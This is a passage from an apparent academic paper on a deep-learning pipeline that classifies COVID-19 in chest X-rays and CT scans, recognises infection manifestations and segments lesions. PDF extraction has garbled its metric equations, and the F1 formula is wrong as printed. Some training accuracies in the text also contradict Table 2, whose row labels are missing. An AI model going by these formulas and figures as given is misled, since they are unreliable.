(Patel et al., 2019), in order to harness the power of both approaches while avoiding their respective limitation simultaneously. For the current pandemic, though, using imaging as a first-line diagnostic tool for COVID-19 has been controversial to date (Hope et al., 2020; Fang et al., 2020; Zu et al., 2020; Ai et al., 2020). Meanwhile, to the best of our knowledge, there is a consensus on the possibility of using medical imaging as a digital second opinion, or a complement, to the gold standard PCR-based tests. For example, He et al. (2020) and Chen et al. (2020), respectively, highlighted CT scans as either a tool with comparable diagnostic performance as initial RT-PCR, or an important screening tool especially for patients who have initial negative results for the RT-PCR test. Accordingly, highly-paced research has been devoted to harness the potential of deep learning-based medical imaging diagnostics, towards the goal of providing a rapid, accurate, scale-able, and affordable diagnosis. Deep neural network models have shown a considerable potential with regards to automatic detection of lung diseases (EL-Bana, Al-Kabbany & Sharkas, 2020; Polat & Danaei Mehr, 2019; Nasrullah et al., 2019). Thanks to their ability to extract and learn meaningful features, deep models can provide an effective alternative to manual labeling by radiologists—a task that is highly impacted by individual clinical experiences. Recent literature highlights the adoption of deep neural networks to analyze X-ray and CT scans, in order to recognize/classify COVID-19 from healthy subjects. Moreover, COVID-19 virus has a bilateral distribution of patchy shadows and ground glass opacity in early stages, which progress to multiple ground glass opacities and infiltrations in both lungs (Wang et al., 2020). These features are very similar to other types of pneumonia with only slight differences that are difficult to be distinguished by radiologists. Hence, deep models have been used to recognize/classify COVID-19 from other types of pneumonia, including bacterial and viral pneumonia (Narin, Kaya & Pamuk, 2020; Wang & Wong, 2020; Song et al., 2020). Deep models have also been used in the quantification and the segmentation of infection manifestations such as ground-glass opacity (GGO) and pulmonary consolidation, in early and late stages of infection, respectively (Ye et al., 2020; Ai et al., 2020). In this research, we are inspired by a typical flow in a real-life scenario where a radiologist would employ a deep learning-empowered screening system, first, to recognize/diagnose COVID-19, then to quantify and segment infection manifestations in X-ray and CT scans. The development of multi-task pipelines has been the scope for previous research (Amyar, Modzelewski & Ruan, 2020). Nevertheless, we demonstrate either competitive or superior performance compared to the recent literature at every stage of the proposed pipeline. The following points summarize the principal contributions of this research: 1. We outperformed the recent literature on COVID-19 recognition by attaining a classification accuracy of 99.4% for the two-class problem, that is (COVID-19/ Non-COVID-19) and 98.1% for the four-class problem of recognizing COVID-19 among scans that involve normal cases, other types of pneumonia, in addition to COVID-19. To achieve this performance, we propose a training procedure that involves El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 3/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ fine-tuning of an Inception-v3 architecture. We present the performance of this architecture under varying learning parameters, and using different performance metrics. 2. For the same stage, we show comparative analysis for learning using X-ray scans only against learning from X-ray and CT scans combined, that is, multi-modal learning, and we demonstrate a potential advantage for the latter. 3. We propose a CNN architecture for multi-label recognition/classification (ML-CNN) of different types of lung infection manifestations. Particularly, we solve the problem of identifying the probabilities of having infection manifestations, such as Ground Glass Opacities (GGO), Pleural Effusion (PE), and Consolidation, in medical scans. This is envisaged to have a potential role in the early diagnosis of COVID-19. It is worth mentioning that this problem was not addressed by previous work on multi-task pipelines for COVID-19 (Amyar, Modzelewski & Ruan, 2020). 4. We adapt knowledge from another domain, namely, pulmonary nodule detection, to enhance the segmentation of lung infections in chest CT scans. Particularly, we employ our own previous work (EL-Bana, Al-Kabbany & Sharkas, 2020) on improving semantic segmentation of pulmonary nodules using the recently proposed DeepLab-v3+ architecture. Moreover, using Xception network as a feature extractor backbone, we evaluate the performance of the DeepLab model, which suits client-side applications. 5. We propose a new learning procedure for semantic segmentation of infection manifestations. It involves the training of multiple streams, each of which is specialized to segment a specific type of manifestations. We demonstrate the effectiveness of this procedure over single stream-based segmentation, and compared to the recent literature, we attain an increase of approximately 4.5% and 2.5% for mean intersection- over-union (mIoU) and dice coefficient, respectively. The rest of the article is organized as follows: Previous research that incorporates deep learning methods for COVID-19 diagnosis and infection segmentation is presented in “Related Work”. “Proposed Methods” discusses the proposed multi-stage pipeline, and we elaborate on the adopted datasets, data augmentation methods, and pre-processing techniques. “Results and Discussion” is dedicated to highlight and discuss the Experimental results, and finally the work is concluded in “Conclusion”. Related work This research intersects with four main areas in the literature, namely, COVID-19 recognition based on deep models, segmentation of COVID-19-related infection manifestations based on deep models, multi-task pipelines that have the ability to accomplish both tasks, and multi-stream recognition pipelines. In the rest of this section, we highlight the most relevant (to the proposed work) in these four areas. The literature on COVID-19 diagnosis features end-to-end deep models as well as transfer learning approaches. Sethy & Behera (2020), for example, proposed a COVID-19 classification method in X-ray images using deep features that are computed using a El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 4/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ pre-trained convolutional neural network (CNN) model, and an SVM classifier. This method attained an accuracy of 95.38% with the ResNet50 model employed as the feature extractor. In Li et al. (2020a), a retrospective, single-center, study was conducted on 78 patients. They aimed at investigating the correlation between CT-based manifestations and clinical classification of COVID-19. With an attained sensitivity of 82.6% and a specificity of 100.0%, they concluded that CT-based quantitative analysis is highly correlated with the clinical classification of COVID-19. They also pointed out that CT visual quantitative analysis is highly consistent in terms of the Total Severity Score that was introduced in their research. Ozkaya, Ozturk & Barstugan (2020) used a dataset of 150 CT scans to generate two sub-datasets of 16 × 16 and 32 × 32 patches. Deep features were then computed and an SVM classifier was trained on producing binary labels. They also proposed a novel method for feature ranking and fusion to enhance the performance of the proposed approach. An accuracy of 98.27% and 98.93% sensitivity were attained on the latter sub-dataset of patches. A weakly-supervised software system was developed in Zheng et al. (2020). It adopts deep learning and uses 3D CT volumes to detect COVID-19, achieving a specificity and sensitivity of 0.911 and 0.907, respectively. The U-Net model is a CNN that was proposed by Ronneberger, Fischer & Brox (2015), and is among the widely-adopted neural networks in medical image segmentation. It was further extended to 3D U-Net (Çiçek et al., 2016), and UNet++ (Zhou et al., 2019) that showed promising performance on various image segmentation tasks. Zhou, Canu & Ruan (2020) proposed a U-Net-based segmentation technique that addressed COVID-19, and that employed an attention mechanism on 100 CT slices. They obtained a Dice Score of 69.1%. In our previous work (EL-Bana, Al-Kabbany & Sharkas, 2020), DeepLab-v3+ (Chen et al., 2017) was shown to outperform U-Net in pulmonary nodule segmentation. Fan et al. (2020) proposed a novel COVID-19 deep model for lung infection segmentation (Inf-Net) to identify infected regions from chest CT scans in an automated manner. On ground glass opacities and consolidation, Inf-Net achieved a dice coefficient of 0.646 and 0.238, respectively. Also, Elharrouss, Subramanian & Al-Maadeed (2020) proposed a deep-learning-based, multi-task, two-stage approach for infection segmentation in CT-scans. The first stage involves the possibly-infected lung regions, which is followed by segmenting the infections in these regions. Amyar, Modzelewski & Ruan (2020) proposed a deep learning model that jointly identifies COVID-19 and segments the related lesions in chest CT scans. Their three-arm model consisted of a common encoder and two decoders for image reconstruction and segmentation, where the image reconstruction stage is meant to enhance feature representation. The third arm featured a multi-layer perceptron neural network for COVID-19 recognition, that is, a binary classification problem. For the segmentation task, they achieved a dice coefficient of 0.78. Wu et al. (2020) proposed a COVID-19 classification and segmentation system, that was trained on a dataset containing 144,167 CT scans, collected from 400 COVID-19 patients and 350 uninfected cases. Their JCS model achieved a 78.3% Dice Coefficient on the segmentation test set, and a sensitivity of 95.0%, and a specificity of 93.0% on the classification test set. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 5/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Deep networks with multiple streams have been employed in visual recognition applications. To the best of our knowledge, Simonyan & Zisserman (2014) were the first to adopt a two-stream ConvNet architecture, which incorporates spatial and temporal networks, for action recognition in videos. The proposed architecture involved training the second stream on optical flow, and it was shown to attain a very good performance despite limited data. Following the work of Simonyan & Zisserman (2014), other multi-stream techniques that adopt other modalities (Zhang et al., 2016) were proposed. In contrast to these previous techniques, our proposed multi-stream approach for segmenting infection manifestations trains each stream on a different label, rather than training each stream on a different modality of the whole dataset (all the labels). The latter is still a point of future research, though. Proposed methods A machine learning-empowered system for COVID-19 diagnostics inherently involves multiple tasks. As a digital second opinion for radiologists, the system would first be required to recognize COVID-19 in medical scans. It might further be asked to differentiate between COVID-19 and other types of pneumonia. Following the recognition of COVID-19, the system would be required to identify the probability of presence of different infection manifestations, and would further be asked to segment the regions corresponding to these manifestations accurately. Figure 1 depicts the proposed pipeline which realizes the aforementioned tasks. First, we employ the Inception-v3 model for image classification, particularly, for COVID-19 recognition. Second, we train a Figure 1 The block diagram of the proposed method. Full-size DOI: 10.7717/peerj-cs.303/fig-1 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 6/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-1 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ multi-label classifier to infer the probability of different types of infection manifestations, namely, Ground Glass Opacities (GGO), Pleural Effusion (PE), and Consolidation. The third stage involves feeding COVID-19 CT scans to DeepLab-v3+ model, which produces binary segmentation masks that highlight the regions corresponding to infection manifestations. To alleviate the impact of the limited amount of data, we use data augmentation techniques throughout the proposed pipeline. In the rest of this section, we elaborate on the datasets that are used for the training and testing of the proposed models, we elaborate on the adopted data augmentation techniques, and we discuss the implementation details of each of the three stages in the pipeline. Datasets To the best of our knowledge, the research community still lacks a comprehensive dataset that involves CT and/or X-ray scans and that suits both diagnosis and segmentation tasks at the same time. This necessitates the reliance on multiple datasets if the goal is to develop a multi-task pipeline. For training the proposed deep models, we used the following datasets, which involve two of the most widely used datasets in the recent literature (Fan et al., 2020): 1. COVID-19 CT Segmentation Dataset: This dataset includes 100 axial CT images from 40 patients with COVID-19. The images were segmented by a radiologist using Three labels: ground-glass, consolidation and pleural effusion. Figure 2 shows an example of CT COVID-19 slice from the dataset. 2. The COVID-19 Image Data Collection Repository on GitHub: This dataset is hared by Dr. Joseph Cohen. It is a growing collection of deidentified chest X-rays (CXRs) and CT scans from COVID-19 cases internationally (Cohen, Morrison & Dao, 2020). 3. The RSNA Pneumonia Detection Challenge Dataset: This dataset is available on Kaggle, and it contains several deidentified CXRs and includes a label indicating whether the image shows evidence of pneumonia. Figure 3 shows different examples of X-ray images from the dataset. Preprocessing and data augmentation All medical scans were resized to have the shape of 512 × 512 × 3. The Contrast Limited Adaptive Histogram Equalization (CLAHE) method is used for enhancing small details, textures and local contrast of the images (Zuiderveld, 1994). Local details can therefore be enhanced even in the regions that are darker or lighter than most of the image (Koonsanit et al., 2017). To avoid over-fitting, since the number of CT volumes is limited, we applied data augmentation strategies such as random transformations. These transformations include rotation, horizontal and vertical translations, zooming and shearing. For each training sample, the transformation parameters were randomly generated and the augmentation was identically applied for each slice in the sampled image. We augmented each training sample 34 times, and each validation and test sample 51 times. The augmentation for the training, validation and testing datasets, rather than the training dataset only, is done in accordance with recent findings on the impact of El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 7/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ test-time augmentation on the system performance (Perez et al., 2018). More details about the medical scans included in the adopted datasets are summarized in Table 1, such as the types of involved cases, the number of slices in each case and their modalities, and the total number of slices after augmentation. Table 1 Details of the medical scans included in the adopted datasets, such as the cases available, the number of slices in each case and their modalities, the total number of slices after augmentation, and the task supported by each type of slices. Case Modality #Slices Total after Augmentation Task COVID-19 COVID-19 X-rays 60 1,995 Diagnosis COVID-19 (with segmented masks) CT Scan 100 3,724 Diagnosis + Segmentation Pneumonia Bacterial Pneumonia X-rays 70 2,122 Diagnosis Viral Pneumonia X-rays 70 2,277 Diagnosis Normal Normal X-rays 70 2,485 Diagnosis Figure 2 An example of a CT scan. (A) COVID-19 CT axial slice, (B) ground truth segmented mask. The white regions in the latter represent the consolidation, while the dark gray regions represent pleural effusion, and light gray regions represent ground-glass opacities. Please see sub-section 1. Full-size DOI: 10.7717/peerj-cs.303/fig-2 Figure 3 Examples of input X-ray images from the adopted datasets. (A) Covid-19, (B) normal, (C) Pneumonia Bacteria, (D) Pneumonia Virus. Please see subsection 1. Full-size DOI: 10.7717/peerj-cs.303/fig-3 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 8/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-2 http://dx.doi.org/10.7717/peerj-cs.303/fig-3 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ COVID-19 recognition using transfer learning on the inception-v3 architecture The Inception-v3 architecture is an evolution of the GoogLeNet architecture. Prior to GoogLeNet, such as in the AlexNet and VGGNet architectures, a standard structure for CNNc consisted of stacked convolutional layers, max-pooling, and full-connected layers. To avoid over-fitting, computational demand, and exploding or vanishing gradients, the inception architecture encouraged sparsity through local sparse structures, namely, the Inception Modules/Blocks. Each of these blocks consists of four paths, and contains filters (convolutions) of different sizes, providing the ability to extract patterns at different spatial sizes. Convolutional layers that consist of 1 × 1 filters were used to make the network deeper, and to reduce the model’s complexity and the number of parameters, by reducing the number of input channels. The 1 × 1 convolutional layers also add more non-linearity by using ReLU after each 1 × 1 convolutional layer (Mahdianpari et al., 2018). The fully connected layer in this architecture is replaced with a global average pooling layer. In comparison to GoogLeNet, Incpetion-v2 featured the factorization of convolutions into smaller convolutions, while Incpetion-v3 extended Incpetion-v2 by batch-normalization of the fully connected layer of the auxiliary classifier (Szegedy et al., 2016). Figure 4 depicts a compressed view of the Inception-v3 (Xia, Xu & Nan, 2017) model. In the first stage of the proposed pipeline, we fine-tuned an Incpetion-v3 architecture, which consists of a feature extraction stage, followed by a classification stage. Instead of training the whole architecture from scratch, we started from a model that is pre-trained on ImageNet. We left the weights of the pre-trained model untouched while the final layer is retrained from scratch. The number of classes in the dataset determines the number of output nodes in the last layer. In “Results and Discussion”, we discuss the impact of varying learning parameters, such as the number of steps and the learning rate, Figure 4 A schematic diagram of the Inception-v3 architecture, inspired by the research in Szegedy et al. (2016). Full-size DOI: 10.7717/peerj-cs.303/fig-4 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 9/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-4 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ on the attained accuracy. We also demonstrate the performance of fine-tuning using multi-modal data, that is, X-rays and CT scans, as compared to fine-tuning using X-rays only. A CNN architecture for multi-label recognition of infection manifestations in chest CT scans There are several differences between the proposed pipeline and previous work on multi-task models for COVID-19 (Amyar, Modzelewski & Ruan, 2020). One principal difference, though, is that the second stage of our pipeline addresses a problem that was not handled by previously proposed models (Amyar, Modzelewski & Ruan, 2020), namely, the inference of the probabilities of presence of different infection manifestations, namely, Ground Glass Opacities (GGO), Pleural Effusion (PE), and Consolidation. Given that the output of the segmentation stage is a binary mask, important insights are missing with regards to the types of manifestations that correspond to the segmented regions, that is, the white regions in the output mask. COVID-19 CT scans have featured three types of manifestations, namely, ground-glass opacity, consolidation and pleural effusion. Moreover, a scan may include one or more types of infections; hence it is a multi-label image recognition/classification problem. Towards the goal of recognizing different manifestations, we propose the CNN architecture that is shown in Fig. 5. The output of this architecture is a vector of three probabilities for the presence of ground-glass opacities, consolidations and pleural effusion in a CT scan. In a sense, the output of this stage complements the information obtained from binary segmentation masks, which will be addressed by the third stage of the pipeline. In addition, we envisage the second stage to have a significant role in early diagnosis even if the output from the first stage does not indicate signs for COVID-19. Figure 5 The proposed CNN model for multi-label classification of infection manifestations. As depicted in the figure, the output from the model are the probabilities of having different types of infection manifestations in chest CT scans. Full-size DOI: 10.7717/peerj-cs.303/fig-5 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 10/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-5 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ The convolutional layers consist of M kernels of size N × N. Max-pooling is applied in non-overlapping windows of size 2 × 2. Every max-pooling reduces the size of each patch by half. Two dense layers with 128 and 64 neurons respectively are used with a dropout of 0.5 to avoid over-fitting, and the elu activation function is applied. The last layer is a dense layer for image classification using a sigmoid function to obtain the multi-label predictions and a cross entropy as the loss function. For N > 2, that is, multi-label classification, we calculate a separate loss per observation for each class label and sum the result as follows: loss ¼ � XN i¼1 yi logðŷiÞ (1) where, N is the number of classes, y is the corrected label, ŷ is a predicted output. Another principal difference between the proposed model and the work in Amyar, Modzelewski & Ruan (2020) is that we deal with each task in the pipeline separately, that is, there is no common encoder. Hence, we are able to harness the power of different architectures in each task. This becomes apparent in the third stage where we adopted the DeepLab-v3+ model for segmentation, which was shown to achieve significantly better results (EL-Bana, Al-Kabbany & Sharkas, 2020) compared to U-NET that was adopted in Amyar, Modzelewski & Ruan (2020). Segmenting infection manifestations with knowledge adaptation from pulmonary nodule segmentation The third stage of the proposed pipeline uses the first dataset in sub-section 1, and is concerned with pixel-level segmentation of the regions corresponding to infection manifestations in CT scans. We capitalize on our previous research work in EL-Bana, Al-Kabbany & Sharkas (2020) in which we employed the DeepLab-v3+ model with CT scans to enhance the segmentation of pulmonary nodules, and in which we attained competitive results compared to the recent literature. The DeepLab-v3+ model was developed by Google, and it involves a simple decoder module to refine the segmentation masks along object boundaries. The model is fed with a single CT slice, and the corresponding ground truth mask showing the lesion locations is expected at the output. We explain the elements of the adopted model as follows: 1. Atrous Separable Convolution: This form of convolution (Chen et al., 2019) is meant to reduce the complexity of the proposed model without compromising the performance. It is applied in the depth-wise convolution, where a depth-wise separable convolution replaces the standard convolution with two consecutive steps, namely, a depth-wise convolution followed by a point-wise convolution (i.e., 1 × 1 convolution). For 2D signals, each location i on the output feature map y, atrous convolution is computed as follows: y½i� ¼ X k ½xi þ r:k�w½k�; (2) El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 11/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ where w is a convolution filter. The stride with the sampled input signal is determined by the atrous rate r. Standard convolution, though, is a particular case with r = 1. 2. Encoder: In segmentation tasks, objects in images as well as their locations represent the essential information required to accomplish successfully the computation of segmentation masks. This information is expected to get extracted by the encoder. In the proposed pipeline, the primary feature extractor in the DeepLab-v3+ model is an Aligned Xception model—a modified version of the Xception-65 model (Chollet, 2017). Xception is a modified version of the Inception module, in which Incpetion modules are replaced with separable depth convolutions. Moreover, in Aligned Xception, we use depthwise separable convolution with striding instead of all the maximum pooling operations. After each 3 × 3 depthwise convolution, extra batch normalization and ReLU activation are applied. Also, the depth of the model is increased without varying the entry flow of the network structure. Figure 6 depicts the modified Xception model. 3. Decoder: In this stage, the features computed during the encoding phase are employed to compute the segmentation masks. First, we bilinearly-upsample the encoder features by a factor of 4, before we concatenate them with the corresponding low-level features. 1 × 1 convolution is used on the low-level features before concatenation, in order to decrease the number of channels. After the concatenation, 3 × 3 convolutions are applied to enhance the features, which is followed by another bilinear upsampling by a factor of 4, as shown in the DeepLab-v3+ model in Fig. 1. In this work, we started from a pre-trained DeepLab-v3+ model. Particularly, we adapt another knowledge domain, namely, the pulmonary nodule segmentation, to enhance the segmentation of COVID-19 manifestations in CT-scans. We used the pre-trained model weights that were obtained in EL-Bana, Al-Kabbany & Sharkas (2020). Furthermore, since we focus on the enhancement of segmentation masks, we propose a new learning procedure that involves specialized streams, each of which features a DeepLab-v3+ model that trains to segment a specific type of manifestations. In the next section, we present the results of the proposed pipeline, and we elaborate on the gain of training multiple specialized streams as compared to a single-stream pipeline. RESULTS AND DISCUSSION All the simulations were carried out on a machine with a GeForce GTX 1080Ti GPU, and 8 GB of VRAM. We used Python as the primary programing language and Tensorflow as the backbone in all the experiments. This research implements a new multi-task pipeline that is capable of accomplishing the following types of tasks: (1) COVID-19 classification in X-rays and CT scans, (2) Multi-label recognition of COVID-19 manifestations in CT scans, and (3) and segmentation of COVID-19 manifestations in CT scans. We adopted the most commonly used performance metrics in the respective areas, that is, for classification and segmentation, which are: sensitivity, specificity, accuracy, precision, F1-Score, Dice Coefficient (DSC), Intersection over Union (IoU), and Matthews El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 12/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Correlation Coefficient (MCC). The mathematical expressions for computing the aforementioned metrics are are given by: Accuracy ¼ TP þ TN TP þ TN þ FP þ FN ; (3) Senstivity ¼ TP TP þ FN ; (4) Specificity ¼ TN TN þ FP ; (5) Precision ¼ TP TP þ FP ; (6) MCC ¼ ðTP � TNÞ � ðFN � FPÞffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi ðTP þ FNÞ � ðTN þ FPÞ � ðTP þ FPÞ � ðTN þ FNÞ p ; (7) F1‐Score ¼ 2 � precision:Recall precision þ precision ; (8) DSC ¼ 2 A T Bj j Aj j þ Bj j ; (9) Figure 6 The modified Xception model (Chen et al., 2018) which is used as the backbone (feature extractor) for the DeepLab-v3+ model in the segmentation stage of the proposed pipeline. Full-size DOI: 10.7717/peerj-cs.303/fig-6 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 13/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-6 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ IoU ¼ TP TP þ FP þ FN ; (10) where TP, FP, FN, and TN are the number of True Positives, False Positives, False negatives, and True Negatives, respectively. For the segmentation task, our training set contains 5,000 COVID-19 images and the test set has 403 images. For the classification task, however, the training set contains the 9,618 images, and 955 images are included in the test set. For the two-class version of the classification problem, that is, COVID-19 vs. Normal, the total number of training images are 5,219, and 536 images are included in the test set. Train-test split was used for the evaluation in the three tasks. In the rest of this section, we refer to the COVID-19 classification of stage 1 as Task 1, to the multi-label recognition problem of stage 2 as Task 2, and the segmentation problem of stage 3 as Task 3. Results of Task 1: classification using a fine-tuned inception-v3 model For fine-tuning the Inception-v3 model, we used a batch size of 100 for 2,800 steps/ iterations. Starting from a pre-trained model on ImageNet, we removed the weights of the last layer and re-trained it using X-ray and CT scans. For the four-class version of the recognition problem, that is, COVID-19, Normal, Viral Pneumonia, and Bacterial Pneumonia, the number of output nodes that is equal to the number of the classes is set to 4. For the two-class version of the recognition problem, that is, COVID-19 and Normal, the number of output nodes is set to 2. The last layer of the model was trained with the back-propagation algorithm, and the weight parameter is adjusted using the cross-entropy cost function by calculating the error between the softmax layer output and the specified sample class label vector. Table 2 summarizes the results of the fine-tuned Inception-v3 model using 0.01 learning rate on the two-class and the four-class problems. After 2,800 steps for 4 classes, we achieved an accuracy of 99.9%, 97.71%, and 98.1% for the training, validation and testing, respectively. For 2 classes, however, we achieved an accuracy of 98.84%, 99.08%, and 99.4% for the training, validation and testing respectively. The confusion matrices of the two- class and four-class cases are shown in Figs. 7A and 7B respectively. We also show the variations of the accuracy and cross-entropy for that model for classification of 2 classes in Fig. 8. We also compared the performance of the adopted model with other models in the recent literature. Table 3 presents a summary of the accuracy, sensitivity, specificity, precision, F1-Score and MCC attained by different architectures. We demonstrate that the transfer learning approach with Inception-v3 surpassed all other architectures by Table 2 Classification results of the fine-tuned Inception-v3 model for the two-class and the four-class COVID-19 recognition problems. Please see text for more details. # of Classes Training accuracy (%) Validation accuracy (%) Test accuracy (%) Training cross entropy Validation cross entropy Classes 98.59 97.71 98.1 0.07687 0.09425 Classes 99.84 99.08 99.4 0.01626 0.03283 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 14/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ achieving a 99.4% accuracy in case the training was done using X-rays only. We further tried to train using multi-modal data, that is, using X-rays and CT scans, and we achieved a 99.5% accuracy. We argue that the increase in the attained accuracy, using Figure 8 The variation of accuracy and cross-entropy using the Inception-v3 model with 2-classes X-ray dataset. (A) The variation of accuracy. (B) The variation of cross-entropy. Full-size DOI: 10.7717/peerj-cs.303/fig-8 Figure 7 Confusion matrices of the fine-tuned Inception-v3 model for the two-class and the four- class COVID-19 recognition problems. (A) Confusion matrix for two classes, (B) Confusion matrix for four classes. Full-size DOI: 10.7717/peerj-cs.303/fig-7 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 15/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-8 http://dx.doi.org/10.7717/peerj-cs.303/fig-7 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ multi-modal data, is due to the 3D cues that are provided by, and inherently exist, in CT scans, but are missing in X-rays. It is worth mentioning that in order to avoid imbalanced data, we made sure that we have an equal number of X-rays and CT scans when we trained with multi-modal data. Particularly, we under-sampled the X-rays so that we get a number equal to the number of available CT scans. The under-sampling was done randomly, and we report the results that corresponds to the average of 5 runs. Complete results for each of the 5 runs are given in Table 4. It is worth mentioning that due to the limited number of available CT scans, uni-modal learning (using X-rays only) was carried out using a larger number of scans, yet multi-modal learning attained a slightly higher accuracy—99.4% for the former vs. 99.5% for the latter. We report this comparison to highlight that multi-modal learning is worth further exploration when larger number of CT scans becomes available. Table 3 Comparing the recognition performance of the proposed model with other models in the recent literature. Method Modality Accuracy (%) Senstivity (%) Specificty (%) Precision (%) F1-score (%) FPR MCC (%) 4-Classes Alexnet (Loey, Smarandache & Khalifa, 2020) X-ray 66.67 66.67 – 64.68 65.66 – – Resnet18 (Loey, Smarandache & Khalifa, 2020) X-ray 69.46 66.67 – 72.50 69.46 – – ShuffleNet + SVM (Sethy & Behera, 2020) X-ray 70.66 65.26 – – 58.79 17.36 – Googlenet (Loey, Smarandache & Khalifa, 2020) X-ray 80.56 80.56 – 84.17 82.32 – – CNN (Zhao et al., 2020) CT 84.7 76.2 – 97.0 85.3 – – Inception-v3 + SVM (Sethy & Behera, 2020) X-ray 96.00 90.26 – – 90.28 4.86 – DenseNet201 + SVM (Sethy & Behera, 2020) X-ray 97.33 93.86 – – 93.86 3.06 – XceptionNet + SVM (Sethy & Behera, 2020) X-ray 97.33 93.00 – – 93.00 3.50 – VGG-16 + SVM (Sethy & Behera, 2020) X-ray 97.33 94.20 – – 94.20 2.90 – InceptionResnetV2 + SVM (Sethy & Behera, 2020) X-ray 97.33 91.13 – – 91.74 4.43 – Ours TL-Incep-V3 X-ray 98.1 98.02 98.03 98.2 98.2 2 – 2-Classes DRE-Net (Song et al., 2020) CT 64 92 96.12 96 94 3.85 88.3 DenseNet CT 96.25 96.29 96.21 96.29 96.29 – – VGG-16 CT 96.93 99.20 94.67 94.90 97.0 5.33 93.96 Resnet-50 CT 97.33 99.20 95.47 95.63 97.38 4.53 94.73 GoogleNet CT 97.87 96.93 98.80 98.78 97.85 1.2 95.75 Ozkaya, Ozturk & Barstugan (2020) CT 98.27 98.93 97.60 97.63 98.28 2.4 96.54 MobileNet v2 X-ray 97.40 99.10 97.09 – – – – VGG19 X-ray 98.75 92.85 98.75 – – – – Ours TL-Incep-V3 X-ray 99.4 99.5 99.1 99.1 99.3 0.9 98.7 Ours TL-Incep-V3 CT + X-ray 99.5 99.8 98.2 99.2 99.5 0.81 99.0 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 16/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Results of Task 2: multi-label classification of infection manifestations in CT scans In the multi-label classifier, each convolutional layer is followed by maxpooling and dropout regularization of 25% to prevent the model from over-fitting. We used 5 × 5 filter for convolution and 2 × 2 for maxpooling, then, a flattening operation is carried out for classification. The activation function is elu for all the layers, except for the last one which is a sigmoid, in order to generate a probability for each label—ground glass, consolidation, and pleural effusion. The loss function is the binary cross-entropy and the metric is the accuracy, with Adam as the optimizer (Kingma & Ba, 2014). The model was trained for 50 epochs. Figure 9 shows the confusion matrix for the three labels in the Table 4 The prediction performance for the five runs which were carried out on two-class, multi-modal data (X-ray and CT scans). Test no Accuracy (%) Senstivity (%) Specificity (%) Precision (%) F1-Score (%) FPR MCC Test-1 99.7 100 99.4 99.5 99.7 0.57 99.4 Test-2 99.7 100 99.4 99.5 99.7 0.56 99.5 Test-3 99.4 100 98.9 98.9 99.4 1.14 98.9 Test-4 99.7 100 99.4 99.4 99.7 0.64 99.4 Test-5 99.1 99.4 98.9 98.8 99.1 1.16 98.2 Mean 99.5 99.8 99.2 99.2 99.5 0.81 99.0 Figure 9 The confusion matrix of the adopted multi-label classifier. Full-size DOI: 10.7717/peerj-cs.303/fig-9 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 17/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-9 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ COVID-19 dataset. More performance metrics are given in Table 5. It is worth mentioning that we do not report a comparison between our performance at this stage and the recent literature. This is because, to the best of our knowledge, this research is the first to address the problem of recognizing different types of infection manifestations. Even for the recently proposed multi-task model in Amyar, Modzelewski & Ruan (2020), its recognition arm addressed binary classification, which is identical to the two-class problem addressed by stage 1 of our pipeline. The segmentation stage in Amyar, Modzelewski & Ruan (2020) did not address multi-label infection recognition either, as it was limited to produce binary masks. Results of Task 3: semantic segmentation of COVID-19 infection manifestations using multiple specialized streams As mentioned in the previous section, we initialized the DeepLab-v3+ model using the weights of the checkpoint used to segment the lung cancer nodules in our previous work (EL-Bana, Al-Kabbany & Sharkas, 2020). We set the learning rate to 0.0001, the momentum to 0.9, the weight decay to 0.00004, and the steps to 50,000. We also adjusted the atrous rates as [6, 12, 18] with an output stride of 16. In Fig. 10, we present the output segmentation masks on the COVID-19 validation set. The figure shows the segmentation output of each of the specialized streams, and the 